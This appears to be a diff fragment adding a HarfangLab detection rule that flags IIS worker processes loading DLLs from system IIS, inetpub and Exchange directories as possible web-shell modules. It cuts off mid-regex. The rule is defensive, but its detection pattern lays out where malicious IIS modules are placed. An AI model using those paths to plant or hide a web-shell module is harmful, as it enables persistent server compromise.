+ "last_update": "2026-03-23T11:45:34.075904Z",
+ "creation_date": "2026-03-23T11:45:34.075906Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.075910Z",
+ "rule_level": "medium",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#module-reference",
+ "https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/",
+ "https://attack.mitre.org/techniques/T1505/004/"
+ ],
+ "name": "t1505_004_iis_module_native_load_pre43.yml",
+ "content": "title: Suspicious IIS Module Loaded\nid: 0ae4376f-360f-4b97-9b3f-4c735a82fbf6\ndescription: |\n Detects the loading of a suspicious (native) library by an IIS worker process in system-wide IIS binary module directories.\n Malicious DLLs loaded by an IIS worker can be used for different purposes, mostly to act as webshells.\n It is recommended to analyze the content of the loaded library to look for malicious content and to analyze subprocesses of the IIS worker for malicious behavior.\n This rule applies to agents with version before 4.3, and is maintained for compatibility reasons only.\nreferences:\n - https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#module-reference\n - https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n - https://attack.mitre.org/techniques/T1505/004/\ndate: 2023/11/20\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.004\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'w3wp.exe'\n ProcessDescription: 'IIS Worker Process'\n ImageLoaded|re:\n - '(?i)^[A-Z]:\\\\Windows\\\\System32\\\\inetsrv\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\wwwroot\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\inetpub\\\\temp\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<>|]]+\\.dll$'\n - '(?i)^[A-Z]:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\[[:print:]&&[^/:\\*\\?\\\"<>|]]+\\\\bin\\\\[[:print:]&&[^/\\\\:\\*\\?\\\"<